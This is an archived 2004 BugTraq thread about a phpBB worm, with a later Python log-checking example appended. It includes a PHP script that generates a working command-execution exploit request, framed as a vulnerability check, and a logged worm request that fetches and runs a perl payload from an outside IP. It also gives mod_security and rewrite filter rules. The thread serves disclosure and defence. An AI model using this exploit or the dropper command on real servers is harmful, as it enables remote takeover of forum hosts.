BugTraq
phpBB Worm Dec 20 2004 11:51PM
Shannon Lee (shannon webhostworks net) (3 replies)
Re: phpBB Worm Dec 22 2004 03:21PM
Alexander Klimov (alserkli inbox ru)
Re: phpBB Worm Dec 21 2004 10:28PM
Raymond Dijkxhoorn (raymond prolocation net) (2 replies)
Re: phpBB Worm Dec 23 2004 12:59PM
Anders Henke (anders schlund de)
Re: phpBB Worm Dec 22 2004 11:22AM
Sebastian Wiesinger (bofh fire-world de) (1 replies)
Re: phpBB Worm Dec 22 2004 11:34PM
William Geoghegan (w geoghegan geotekcs co uk)
A script to check if your phpBB is vulnerable.
Anything below 2.0.11 _probably_ is, but in case you're not sure, use this
script.

The script generates the request parameters, all you need to do is copy the
result onto www.thesite.com/viewtopic.php

<?
$rush='ls -al'; // command to run
$highlight='passthru($HTTP_GET_VARS[rush])'; // don't touch

print "?t=%37&rush=";

// percent-encode every byte of the command
for ($i=0; $i<strlen($rush); ++$i) {
    print '%' . bin2hex(substr($rush,$i,1));
}

// %2527 is a double-encoded single quote
print "&highlight=%2527.";

for ($i=0; $i<strlen($highlight); ++$i) {
    print '%' . bin2hex(substr($highlight,$i,1));
}

print ".%2527";
?>

Cheers.

William Geoghegan

GEOTEK Computer Services
- www.geotekcs.co.uk -

----- Original Message -----
From: "Sebastian Wiesinger" <bofh (at) fire-world (dot) de>
To: <bugtraq (at) securityfocus (dot) com>
Sent: Wednesday, December 22, 2004 11:22 AM
Subject: Re: phpBB Worm

>* Raymond Dijkxhoorn <raymond (at) prolocation (dot) net> [2004-12-22 00:06]:
>> If you cannot fix it (virtual servers) fast for all your clients you could
>> also try with something like this:
>>
>> RewriteEngine On
>> RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
>> RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
>> RewriteRule ^.*$ - [F]
>>
>> We had some vhosts where this worked just fine. On our systems we didn't
>> see any valid request with echr and esystem, just be gentle with it, it
>> works for me, it could work for you ;)
>
> If you use mod_security, this may help, too:
>
> SecFilterSelective "THE_REQUEST" "(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite)\s*\("
>
> I had another exploit attempt, with this payload:
>
> 66.119.13.4 - - [22/Dec/2004:10:06:47 +0100] "GET
> /forum/viewtopic.php?t=%37&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%
20%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%31%32%38%2E%31%37%34%2E%31%33%
37%2E%32%33%30%2F%62%6E%20%2D%4F%20%2E%62%3B%20%70%65%72%6C%20%2D%70%65%
20%79%2F%74%68%6D%76%64%77%30%39%38%37%36%35%34%33%32%31%75%6F%69%65%61%
2F%61%65%69%6F%75%31%32%33%34%35%36%37%38%39%30%77%64%76%74%68%6D%2F%20%
2E%62%7C%20%70%65%72%6C%3B%20%72%6D%20%2D%66%20%2E%62%20%2A%2E%70%6C%20%
62%30%74%2A%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%7
3%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%7
3%68%5D%29.%2527
> HTTP/1.1" 200 12266 "-" "-"
>
> Which decodes to:
>
> rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe
> y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/ .b| perl; rm -f .b *.pl
> b0t*; echo _END_
> highlight='.passthru($HTTP_GET_VARS[rush]).'
>
> Regards,
>
> Sebastian
>
> --
> GPG Key-ID: 0x76B79F20 (0x1B6034F476B79F20)
> Wehret den Anfaengen: http://odem.org/informationsfreiheit/
> Thunder rolled. ... It rolled a six.
> --Terry Pratchett, Guards! Guards!

RE: phpBB Worm Dec 21 2004 08:11PM
Paul Kurczaba (paul myipis com)
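
A log-side check for the request quoted in this thread, as an added example that is not part of any poster's message: it decodes the highlight parameter of viewtopic.php requests twice and reports a quote that only appears after the second decode, or a call to one of the PHP functions named in the mod_security filter. The sample log lines and the names highlight_values and classify are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Function names taken from the mod_security filter quoted in this thread.
PHP_CALL = re.compile(
    r"(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite)\s*\(", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def highlight_values(log_line):
    """highlight= values of a viewtopic.php request, percent-decoded once."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/viewtopic.php"):
        return []
    return parse_qs(url.query).get("highlight", [])

def classify(log_line):
    """Reasons a request looks like the highlight injection logged in the thread."""
    reasons = []
    for once in highlight_values(log_line):
        twice = unquote(once)  # second layer: %2527 -> %27 -> '
        if "'" in twice and "'" not in once:
            reasons.append("double-encoded quote")
        if PHP_CALL.search(twice):
            reasons.append("php call")
    return reasons

# Constructed sample lines (documentation addresses). The first highlight value is
# the one from the logged request above, without its rush parameter.
SAMPLE = [
    '192.0.2.10 - - [22/Dec/2004:10:06:47 +0100] "GET /forum/viewtopic.php?t=%37'
    '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F'
    '%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 12266 "-" "-"',
    '192.0.2.11 - - [22/Dec/2004:10:07:02 +0100] "GET /forum/viewtopic.php?t=7'
    '&highlight=don%27t+panic HTTP/1.1" 200 9120 "-" "-"',
    '192.0.2.12 - - [22/Dec/2004:10:07:09 +0100] "GET /forum/index.php?highlight='
    '%2527 HTTP/1.1" 200 5310 "-" "-"',
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(classify(line) or "clean", "<-", line.split('"')[1][:60])
```

A search term with an ordinary single-encoded apostrophe (second sample line) is not reported, because the quote is already visible after the first decode.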


 
